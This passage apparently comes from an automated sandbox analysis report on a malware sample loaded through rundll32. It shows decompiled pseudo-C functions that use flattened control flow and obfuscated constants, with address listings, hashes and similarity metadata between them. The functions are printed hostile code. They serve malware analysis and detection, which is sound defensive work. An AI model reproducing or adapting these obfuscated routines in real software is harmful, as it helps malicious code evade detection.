				_v8 = _v8 ^ 0x006dec69;
				_v12 = 0xe79dac;
				_v12 = _v12 * 0x78;
				_v12 = _v12 + 0xb337;
				_v12 = _v12 ^ 0x6c9daebe;
				do {
					while(_t125 != 0x2aa38ff) {
						if(_t125 == 0x81ec960) {
							_t124 = _t124 + E002EC2F8(_v32, _t116 + 0x38, _v4, _v8, _v12);
						} else {
							if(_t125 == 0xa7224d4) {
								_t118 = _v16;
								_t111 = E002EC2F8(_t118, _t116 + 0x14, _v36, _v40, _v20);
								_t127 =  &(_t127[3]);
								_t125 = 0x81ec960;
								_t124 = _t124 + _t111;
								continue;
							} else {
								if(_t125 != 0xcb4deb0) {
									goto L8;
								} else {
									_push(_t118);
									_push(_t118);
									_t115 = E002D474B();
									_t127 =  &(_t127[2]);
									_t125 = 0xa7224d4;
									_t124 = _t124 + _t115;
									continue;
								}
							}
						}
						L11:
						return _t124;
					}
					_t125 = 0xcb4deb0;
					L8:
				} while (_t125 != 0x4501b46);
				goto L11;
			}





















                                                                                                                                  0x002f0c14
                                                                                                                                  0x002f0c1b
                                                                                                                                  0x002f0c1d
                                                                                                                                  0x002f0c27
                                                                                                                                  0x002f0c2f
                                                                                                                                  0x002f0c34
                                                                                                                                  0x002f0c3c
                                                                                                                                  0x002f0c44
                                                                                                                                  0x002f0c49
                                                                                                                                  0x002f0c51
                                                                                                                                  0x002f0c56
                                                                                                                                  0x002f0c5e
                                                                                                                                  0x002f0c66
                                                                                                                                  0x002f0c6e
                                                                                                                                  0x002f0c76
                                                                                                                                  0x002f0c7e
                                                                                                                                  0x002f0c86
                                                                                                                                  0x002f0c8e
                                                                                                                                  0x002f0c96
                                                                                                                                  0x002f0c9e
                                                                                                                                  0x002f0ca6
                                                                                                                                  0x002f0cab
                                                                                                                                  0x002f0cb8
                                                                                                                                  0x002f0cbc
                                                                                                                                  0x002f0cc4
                                                                                                                                  0x002f0cc6
                                                                                                                                  0x002f0cce
                                                                                                                                  0x002f0cd3
                                                                                                                                  0x002f0ce7
                                                                                                                                  0x002f0ce8
                                                                                                                                  0x002f0cec
                                                                                                                                  0x002f0cf4
                                                                                                                                  0x002f0cfc
                                                                                                                                  0x002f0d04
                                                                                                                                  0x002f0d12
                                                                                                                                  0x002f0d16
                                                                                                                                  0x002f0d1e
                                                                                                                                  0x002f0d26
                                                                                                                                  0x002f0d2e
                                                                                                                                  0x002f0d3b
                                                                                                                                  0x002f0d3f
                                                                                                                                  0x002f0d47
                                                                                                                                  0x002f0d4f
                                                                                                                                  0x002f0d57
                                                                                                                                  0x002f0d5f
                                                                                                                                  0x002f0d67
                                                                                                                                  0x002f0d6f
                                                                                                                                  0x002f0d77
                                                                                                                                  0x002f0d7f
                                                                                                                                  0x002f0d87
                                                                                                                                  0x002f0d94
                                                                                                                                  0x002f0d98
                                                                                                                                  0x002f0da0
                                                                                                                                  0x002f0da8
                                                                                                                                  0x002f0da8
                                                                                                                                  0x002f0db6
                                                                                                                                  0x002f0e2e
                                                                                                                                  0x002f0db8
                                                                                                                                  0x002f0dbe
                                                                                                                                  0x002f0df2
                                                                                                                                  0x002f0df6
                                                                                                                                  0x002f0dfb
                                                                                                                                  0x002f0dfe
                                                                                                                                  0x002f0e03
                                                                                                                                  0x00000000
                                                                                                                                  0x002f0dc0
                                                                                                                                  0x002f0dc2
                                                                                                                                  0x00000000
                                                                                                                                  0x002f0dc4
                                                                                                                                  0x002f0dd0
                                                                                                                                  0x002f0dd1
                                                                                                                                  0x002f0dd2
                                                                                                                                  0x002f0dd7
                                                                                                                                  0x002f0dda
                                                                                                                                  0x002f0ddf
                                                                                                                                  0x00000000
                                                                                                                                  0x002f0ddf
                                                                                                                                  0x002f0dc2
                                                                                                                                  0x002f0dbe
                                                                                                                                  0x002f0e30
                                                                                                                                  0x002f0e39
                                                                                                                                  0x002f0e39
                                                                                                                                  0x002f0e07
                                                                                                                                  0x002f0e09
                                                                                                                                  0x002f0e09
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 9^xu$fj$im
                                                                                                                                  • API String ID: 0-3261451082
                                                                                                                                  • Opcode ID: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                                  • Instruction ID: e29da9798987f1eeb5db65d2b8b4e8dca9a23572cef6bc96f97c6f035c6bcf05
                                                                                                                                  • Opcode Fuzzy Hash: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                                  • Instruction Fuzzy Hash: F65168B24183429BC784CF25D48541BFBE0BFD83A8F501A1DF59566261D3B4CA59CF87
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E6C49 Relevance: 3.9, Strings: 3, Instructions: 104COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                  			E002E6C49(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v88;
				char _v608;
				void* _t92;
				void* _t96;
				void* _t101;
				void* _t112;
				void* _t113;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t92);
				_v52 = _v52 & 0x00000000;
				_v56 = 0x878462;
				_t113 = _t112 + 0x14;
				_v32 = 0x956791;
				_t101 = 0x1300659;
				_v32 = _v32 + 0xffff68af;
				_v32 = _v32 ^ 0x0094d050;
				_v48 = 0xb6c679;
				_v48 = _v48 * 9;
				_v48 = _v48 ^ 0x0662f925;
				_v16 = 0xd9c762;
				_v16 = _v16 << 1;
				_v16 = _v16 | 0xb4c78449;
				_v16 = _v16 ^ 0xb5f30401;
				_v40 = 0x8b331e;
				_v40 = _v40 >> 0xc;
				_v40 = _v40 ^ 0x000c5129;
				_v28 = 0x1269f4;
				_v28 = _v28 >> 4;
				_v28 = _v28 ^ 0x0007e996;
				_v44 = 0xabd705;
				_v44 = _v44 ^ 0x9c90d177;
				_v44 = _v44 ^ 0x9c3fe788;
				_v8 = 0x357d72;
				_v8 = _v8 + 0xd90c;
				_v8 = _v8 ^ 0xccfdbdcb;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x199e890f;
				_v12 = 0x32e6;
				_v12 = _v12 ^ 0x74a35607;
				_v12 = _v12 | 0x704b9008;
				_v12 = _v12 + 0xffff83aa;
				_v12 = _v12 ^ 0x74eee325;
				_v36 = 0xeddfb6;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0xb77b8cf2;
				_v24 = 0xe2b758;
				_v24 = _v24 << 5;
				_v24 = _v24 * 0x38;
				_v24 = _v24 ^ 0x330719f5;
				_v20 = 0x9236d6;
				_v20 = _v20 | 0x3f0523f5;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0x000835ca;
				do {
					while(_t101 != 0x1300659) {
						if(_t101 == 0xa264c44) {
							_t96 = E002D9D31(_v40,  &_v608, _v28, _t101, _v44, _v8);
							_t113 = _t113 + 0x10;
							_t101 = 0xbcabc0e;
							continue;
						}
						if(_t101 != 0xbcabc0e) {
							goto L8;
						}
						return E002E6637( &_v88, _v12, _v36, _v24,  &_v608, _a12, _v20);
					}
					_t96 = E002D4B61( &_v88, _v32, _v48, _v16);
					_t101 = 0xa264c44;
					L8:
				} while (_t101 != 0x478adce);
				return _t96;
			}























                                                                                                                                  0x002e6c55
                                                                                                                                  0x002e6c58
                                                                                                                                  0x002e6c5b
                                                                                                                                  0x002e6c5e
                                                                                                                                  0x002e6c5f
                                                                                                                                  0x002e6c60
                                                                                                                                  0x002e6c65
                                                                                                                                  0x002e6c6e
                                                                                                                                  0x002e6c75
                                                                                                                                  0x002e6c78
                                                                                                                                  0x002e6c7f
                                                                                                                                  0x002e6c81
                                                                                                                                  0x002e6c8d
                                                                                                                                  0x002e6c99
                                                                                                                                  0x002e6ca4
                                                                                                                                  0x002e6ca7
                                                                                                                                  0x002e6cae
                                                                                                                                  0x002e6cb5
                                                                                                                                  0x002e6cb8
                                                                                                                                  0x002e6cbf
                                                                                                                                  0x002e6cc6
                                                                                                                                  0x002e6ccd
                                                                                                                                  0x002e6cd1
                                                                                                                                  0x002e6cd8
                                                                                                                                  0x002e6cdf
                                                                                                                                  0x002e6ce3
                                                                                                                                  0x002e6cea
                                                                                                                                  0x002e6cf1
                                                                                                                                  0x002e6cf8
                                                                                                                                  0x002e6cff
                                                                                                                                  0x002e6d06
                                                                                                                                  0x002e6d0d
                                                                                                                                  0x002e6d14
                                                                                                                                  0x002e6d18
                                                                                                                                  0x002e6d1f
                                                                                                                                  0x002e6d26
                                                                                                                                  0x002e6d2d
                                                                                                                                  0x002e6d34
                                                                                                                                  0x002e6d3b
                                                                                                                                  0x002e6d42
                                                                                                                                  0x002e6d49
                                                                                                                                  0x002e6d4d
                                                                                                                                  0x002e6d54
                                                                                                                                  0x002e6d5b
                                                                                                                                  0x002e6d63
                                                                                                                                  0x002e6d66
                                                                                                                                  0x002e6d6d
                                                                                                                                  0x002e6d74
                                                                                                                                  0x002e6d7b
                                                                                                                                  0x002e6d7f
                                                                                                                                  0x002e6d86
                                                                                                                                  0x002e6d86
                                                                                                                                  0x002e6d8c
                                                                                                                                  0x002e6dcd
                                                                                                                                  0x002e6dd2
                                                                                                                                  0x002e6dd5
                                                                                                                                  0x00000000
                                                                                                                                  0x002e6dd5
                                                                                                                                  0x002e6d90
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e6db0
                                                                                                                                  0x002e6de5
                                                                                                                                  0x002e6dec
                                                                                                                                  0x002e6dee
                                                                                                                                  0x002e6dee
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %t$DL&$r}5
                                                                                                                                  • API String ID: 0-2337153543
                                                                                                                                  • Opcode ID: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                                  • Instruction ID: 8cdfd53a694319f663691077a733c9b470a2c2a588e4d1a7a5ad2c2fc77fa201
                                                                                                                                  • Opcode Fuzzy Hash: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                                  • Instruction Fuzzy Hash: 97413271D0020EEBCF09DFE1D94A4EEBBB1FB58318F608089D41276260D3B54A59CFA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1003B8BC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __decode_pointer.LIBCMT ref: 1003B8CA
                                                                                                                                    • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350BB
                                                                                                                                    • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350D2
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 1003B8D1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1958600898-0
                                                                                                                                  • Opcode ID: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                                  • Instruction ID: 13914855b6ed5f75d6cf868945e622cc1528c9e1cf50f9ea13f0b817109926cd
                                                                                                                                  • Opcode Fuzzy Hash: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                                  • Instruction Fuzzy Hash: 7FC08C388087C04FEB1AD3354D8C30D3E00E713301FC00488DC80D5053EE99410C8323
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E1889 Relevance: 2.8, Strings: 2, Instructions: 278COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E002E1889(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				short _v1564;
				intOrPtr _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _t323;
				signed int _t334;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				void* _t386;
				void* _t387;
				signed int* _t390;

				_t390 =  &_v1680;
				_v1568 = 0xdfec4c;
				_t386 = __ecx;
				_v1564 = 0;
				_t387 = 0xea1969c;
				_v1596 = 0xb94d4f;
				_v1596 = _v1596 >> 2;
				_v1596 = _v1596 ^ 0x002b88ba;
				_v1604 = 0x7820e8;
				_t9 =  &_v1604; // 0x7820e8
				_t337 = 0x3f;
				_v1604 =  *_t9 / _t337;
				_v1604 = _v1604 << 6;
				_v1604 = _v1604 ^ 0x0075b154;
				_v1676 = 0xd796f6;
				_v1676 = _v1676 << 7;
				_t338 = 0x1f;
				_v1676 = _v1676 / _t338;
				_v1676 = _v1676 | 0x34dfec15;
				_v1676 = _v1676 ^ 0x37fcd475;
				_v1580 = 0x701ced;
				_t339 = 0x3b;
				_v1580 = _v1580 / _t339;
				_v1580 = _v1580 ^ 0x000eda5b;
				_v1584 = 0x3864f;
				_v1584 = _v1584 | 0xebab6106;
				_v1584 = _v1584 ^ 0xeba3c8dc;
				_v1668 = 0x7d6229;
				_v1668 = _v1668 + 0x90f9;
				_t340 = 0x7d;
				_v1668 = _v1668 * 0xd;
				_v1668 = _v1668 + 0x17d6;
				_v1668 = _v1668 ^ 0x06671cb6;
				_v1652 = 0x8dafad;
				_v1652 = _v1652 + 0xffffa237;
				_v1652 = _v1652 / _t340;
				_v1652 = _v1652 ^ 0xeab94c45;
				_v1652 = _v1652 ^ 0xeabb4144;
				_v1620 = 0x364acf;
				_v1620 = _v1620 + 0xffffd559;
				_v1620 = _v1620 ^ 0x476b0832;
				_v1620 = _v1620 ^ 0x4757dcec;
				_v1660 = 0xdffac8;
				_v1660 = _v1660 | 0xd3f81aab;
				_t341 = 0xd;
				_v1660 = _v1660 / _t341;
				_v1660 = _v1660 + 0x2ca8;
				_v1660 = _v1660 ^ 0x10473906;
				_v1636 = 0xafa95;
				_v1636 = _v1636 | 0x12b9adda;
				_v1636 = _v1636 + 0xca30;
				_t342 = 0x24;
				_v1636 = _v1636 / _t342;
				_v1636 = _v1636 ^ 0x008bc8e6;
				_v1612 = 0xa1b06d;
				_v1612 = _v1612 ^ 0xd927b519;
				_t334 = 0x1c;
				_v1612 = _v1612 / _t334;
				_v1612 = _v1612 ^ 0x07c55aff;
				_v1628 = 0xe475d7;
				_v1628 = _v1628 + 0xf351;
				_v1628 = _v1628 >> 9;
				_v1628 = _v1628 ^ 0x000b149a;
				_v1644 = 0xc98f78;
				_v1644 = _v1644 + 0xa497;
				_v1644 = _v1644 + 0xab0a;
				_v1644 = _v1644 ^ 0x9916dffd;
				_v1644 = _v1644 ^ 0x99d32d23;
				_v1572 = 0xdb2c8b;
				_v1572 = _v1572 ^ 0xa2354bd4;
				_v1572 = _v1572 ^ 0xa2e9b3f6;
				_v1616 = 0x8ac290;
				_v1616 = _v1616 | 0xd6340cba;
				_t343 = 0x17;
				_v1616 = _v1616 / _t343;
				_v1616 = _v1616 ^ 0x095403ec;
				_v1624 = 0xc9b33;
				_v1624 = _v1624 | 0xadec2c36;
				_t344 = 0x23;
				_v1624 = _v1624 / _t344;
				_v1624 = _v1624 ^ 0x04f29945;
				_v1672 = 0xce6284;
				_t345 = 0x1b;
				_v1672 = _v1672 * 0x47;
				_v1672 = _v1672 >> 0xb;
				_v1672 = _v1672 | 0xab5418c0;
				_v1672 = _v1672 ^ 0xab589207;
				_v1680 = 0xfb4294;
				_v1680 = _v1680 * 0x56;
				_v1680 = _v1680 >> 0xe;
				_v1680 = _v1680 >> 4;
				_v1680 = _v1680 ^ 0x000a896c;
				_v1576 = 0xa0fe48;
				_v1576 = _v1576 / _t345;
				_v1576 = _v1576 ^ 0x000b8e8e;
				_v1608 = 0x915f33;
				_v1608 = _v1608 + 0xfa43;
				_v1608 = _v1608 >> 0xc;
				_v1608 = _v1608 ^ 0x000a30cc;
				_v1648 = 0x21b71b;
				_v1648 = _v1648 ^ 0x78ef874e;
				_v1648 = _v1648 | 0x9c246086;
				_v1648 = _v1648 * 0x4a;
				_v1648 = _v1648 ^ 0x1ce73be6;
				_v1592 = 0x926794;
				_v1592 = _v1592 + 0xffff6f6e;
				_v1592 = _v1592 ^ 0x009c0ed2;
				_v1656 = 0x919083;
				_v1656 = _v1656 / _t334;
				_v1656 = _v1656 >> 2;
				_t346 = 0x67;
				_v1656 = _v1656 / _t346;
				_v1656 = _v1656 ^ 0x0003c4fa;
				_v1664 = 0xb12839;
				_v1664 = _v1664 ^ 0xbcb8295e;
				_v1664 = _v1664 + 0xe70b;
				_v1664 = _v1664 + 0xffffbcc9;
				_v1664 = _v1664 ^ 0xbc0a928f;
				_v1600 = 0x37ff42;
				_v1600 = _v1600 + 0xffff03fd;
				_v1600 = _v1600 >> 3;
				_v1600 = _v1600 ^ 0x000f4750;
				_v1632 = 0xbb4856;
				_v1632 = _v1632 * 0x4e;
				_v1632 = _v1632 | 0xf74fdfff;
				_v1632 = _v1632 ^ 0xff54b7ec;
				_v1640 = 0x73c8d7;
				_v1640 = _v1640 * 0x56;
				_v1640 = _v1640 << 0xb;
				_v1640 = _v1640 >> 7;
				_v1640 = _v1640 ^ 0x005dc3ee;
				_v1588 = 0xe2f656;
				_t323 = _v1588 * 0x57;
				_v1588 = _t323;
				_v1588 = _v1588 ^ 0x4d200bca;
				while(_t387 != 0x5de06da) {
					if(_t387 == 0xea1969c) {
						_t387 = 0xfa9128f;
						continue;
					} else {
						_t395 = _t387 - 0xfa9128f;
						if(_t387 != 0xfa9128f) {
							L8:
							__eflags = _t387 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E002EDA22(_v1596, _v1604, _t395, _v1676,  &_v1040, _t346, _v1580);
							 *((short*)(E002DB6CF( &_v1040, _v1584, _v1668, _v1652))) = 0;
							E002D8969(_v1620,  &_v520, _t395, _v1660, _v1636);
							_push(_v1644);
							_push(_v1628);
							E002D47CE( &_v1040, _v1572, _v1612, _v1616, _v1624, E002EDCF7(_v1612, 0x2d1328, _t395),  &_v520, _v1672, _v1680);
							E002DA8B0(_v1576, _t329, _v1608);
							_t346 = _v1648;
							_t323 = E002DEA99(_t346, _t386, _v1592, _v1656,  &_v1560, _v1664);
							_t390 =  &(_t390[0x17]);
							if(_t323 != 0) {
								_t387 = 0x5de06da;
								continue;
							}
						}
					}
					return _t323;
				}
				_push(_v1588);
				_push( &_v1560);
				_push(_t346);
				_push(0);
				_push(0);
				_push(_v1640);
				_t346 = _v1600;
				_push(0);
				_t323 = E002DAB87(_t346, _v1632, __eflags);
				_t390 =  &(_t390[7]);
				_t387 = 0xa8e801c;
				goto L8;
			}



















































                                                                                                                                  0x002e1889
                                                                                                                                  0x002e188f
                                                                                                                                  0x002e18a1
                                                                                                                                  0x002e18a3
                                                                                                                                  0x002e18aa
                                                                                                                                  0x002e18af
                                                                                                                                  0x002e18b7
                                                                                                                                  0x002e18bc
                                                                                                                                  0x002e18c4
                                                                                                                                  0x002e18cc
                                                                                                                                  0x002e18d0
                                                                                                                                  0x002e18d5
                                                                                                                                  0x002e18db
                                                                                                                                  0x002e18e0
                                                                                                                                  0x002e18e8
                                                                                                                                  0x002e18f0
                                                                                                                                  0x002e18f9
                                                                                                                                  0x002e18fe
                                                                                                                                  0x002e1904
                                                                                                                                  0x002e190c
                                                                                                                                  0x002e1914
                                                                                                                                  0x002e1920
                                                                                                                                  0x002e1925
                                                                                                                                  0x002e192b
                                                                                                                                  0x002e1933
                                                                                                                                  0x002e193b
                                                                                                                                  0x002e1943
                                                                                                                                  0x002e194b
                                                                                                                                  0x002e1953
                                                                                                                                  0x002e1960
                                                                                                                                  0x002e1963
                                                                                                                                  0x002e1967
                                                                                                                                  0x002e196f
                                                                                                                                  0x002e1977
                                                                                                                                  0x002e197f
                                                                                                                                  0x002e198f
                                                                                                                                  0x002e1993
                                                                                                                                  0x002e199b
                                                                                                                                  0x002e19a3
                                                                                                                                  0x002e19ab
                                                                                                                                  0x002e19b3
                                                                                                                                  0x002e19bb
                                                                                                                                  0x002e19c3
                                                                                                                                  0x002e19cb
                                                                                                                                  0x002e19d7
                                                                                                                                  0x002e19dc
                                                                                                                                  0x002e19e2
                                                                                                                                  0x002e19ea
                                                                                                                                  0x002e19f2
                                                                                                                                  0x002e19fa
                                                                                                                                  0x002e1a02
                                                                                                                                  0x002e1a0e
                                                                                                                                  0x002e1a11
                                                                                                                                  0x002e1a15
                                                                                                                                  0x002e1a1f
                                                                                                                                  0x002e1a27
                                                                                                                                  0x002e1a35
                                                                                                                                  0x002e1a3a
                                                                                                                                  0x002e1a3e
                                                                                                                                  0x002e1a46
                                                                                                                                  0x002e1a4e
                                                                                                                                  0x002e1a56
                                                                                                                                  0x002e1a5b
                                                                                                                                  0x002e1a63
                                                                                                                                  0x002e1a6b
                                                                                                                                  0x002e1a73
                                                                                                                                  0x002e1a7b
                                                                                                                                  0x002e1a83
                                                                                                                                  0x002e1a8b
                                                                                                                                  0x002e1a93
                                                                                                                                  0x002e1a9b
                                                                                                                                  0x002e1aa3
                                                                                                                                  0x002e1aab
                                                                                                                                  0x002e1ab9
                                                                                                                                  0x002e1abe
                                                                                                                                  0x002e1ac2
                                                                                                                                  0x002e1aca
                                                                                                                                  0x002e1ad2
                                                                                                                                  0x002e1ae0
                                                                                                                                  0x002e1ae5
                                                                                                                                  0x002e1ae9
                                                                                                                                  0x002e1af1
                                                                                                                                  0x002e1b00
                                                                                                                                  0x002e1b01
                                                                                                                                  0x002e1b05
                                                                                                                                  0x002e1b0a
                                                                                                                                  0x002e1b12
                                                                                                                                  0x002e1b1a
                                                                                                                                  0x002e1b27
                                                                                                                                  0x002e1b2b
                                                                                                                                  0x002e1b30
                                                                                                                                  0x002e1b35
                                                                                                                                  0x002e1b3d
                                                                                                                                  0x002e1b4d
                                                                                                                                  0x002e1b51
                                                                                                                                  0x002e1b59
                                                                                                                                  0x002e1b61
                                                                                                                                  0x002e1b69
                                                                                                                                  0x002e1b6e
                                                                                                                                  0x002e1b76
                                                                                                                                  0x002e1b7e
                                                                                                                                  0x002e1b86
                                                                                                                                  0x002e1b93
                                                                                                                                  0x002e1b97
                                                                                                                                  0x002e1b9f
                                                                                                                                  0x002e1ba7
                                                                                                                                  0x002e1baf
                                                                                                                                  0x002e1bb7
                                                                                                                                  0x002e1bc5
                                                                                                                                  0x002e1bc9
                                                                                                                                  0x002e1bd6
                                                                                                                                  0x002e1bde
                                                                                                                                  0x002e1be2
                                                                                                                                  0x002e1bea
                                                                                                                                  0x002e1bf2
                                                                                                                                  0x002e1bfa
                                                                                                                                  0x002e1c02
                                                                                                                                  0x002e1c0a
                                                                                                                                  0x002e1c12
                                                                                                                                  0x002e1c1a
                                                                                                                                  0x002e1c22
                                                                                                                                  0x002e1c27
                                                                                                                                  0x002e1c2f
                                                                                                                                  0x002e1c3c
                                                                                                                                  0x002e1c40
                                                                                                                                  0x002e1c48
                                                                                                                                  0x002e1c50
                                                                                                                                  0x002e1c5d
                                                                                                                                  0x002e1c61
                                                                                                                                  0x002e1c66
                                                                                                                                  0x002e1c6b
                                                                                                                                  0x002e1c73
                                                                                                                                  0x002e1c7b
                                                                                                                                  0x002e1c80
                                                                                                                                  0x002e1c84
                                                                                                                                  0x002e1c8c
                                                                                                                                  0x002e1c9a
                                                                                                                                  0x002e1d93
                                                                                                                                  0x00000000
                                                                                                                                  0x002e1ca0
                                                                                                                                  0x002e1ca0
                                                                                                                                  0x002e1ca6
                                                                                                                                  0x002e1dc6
                                                                                                                                  0x002e1dc6
                                                                                                                                  0x002e1dcc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e1cac
                                                                                                                                  0x002e1cc5
                                                                                                                                  0x002e1cf6
                                                                                                                                  0x002e1cfd
                                                                                                                                  0x002e1d02
                                                                                                                                  0x002e1d0b
                                                                                                                                  0x002e1d4c
                                                                                                                                  0x002e1d5e
                                                                                                                                  0x002e1d7c
                                                                                                                                  0x002e1d80
                                                                                                                                  0x002e1d85
                                                                                                                                  0x002e1d8a
                                                                                                                                  0x002e1d8c
                                                                                                                                  0x00000000
                                                                                                                                  0x002e1d8c
                                                                                                                                  0x002e1d8a
                                                                                                                                  0x002e1ca6
                                                                                                                                  0x002e1ddc
                                                                                                                                  0x002e1ddc
                                                                                                                                  0x002e1d9d
                                                                                                                                  0x002e1da8
                                                                                                                                  0x002e1da9
                                                                                                                                  0x002e1daa
                                                                                                                                  0x002e1dab
                                                                                                                                  0x002e1dac
                                                                                                                                  0x002e1db4
                                                                                                                                  0x002e1db8
                                                                                                                                  0x002e1db9
                                                                                                                                  0x002e1dbe
                                                                                                                                  0x002e1dc1
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: )b}$ x
                                                                                                                                  • API String ID: 0-2724122486
                                                                                                                                  • Opcode ID: 676e3bfc762169acb8f75ac3539916bc1bbe830c842e832d961dfc938dba5cde
                                                                                                                                  • Instruction ID: c570335adc0e5bf30e12f53d2ee2c04c676c06b8a8ff439d47f06ebfb6447967
                                                                                                                                  • Opcode Fuzzy Hash: 676e3bfc762169acb8f75ac3539916bc1bbe830c842e832d961dfc938dba5cde
                                                                                                                                  • Instruction Fuzzy Hash: 7ED1317150C3819FE368CF21C48A95BFBE2FBC4358F508A2DF29986260D7B58959CF42
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E473C Relevance: 2.7, Strings: 2, Instructions: 233COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 99%
                                                                                                                                  			E002E473C() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
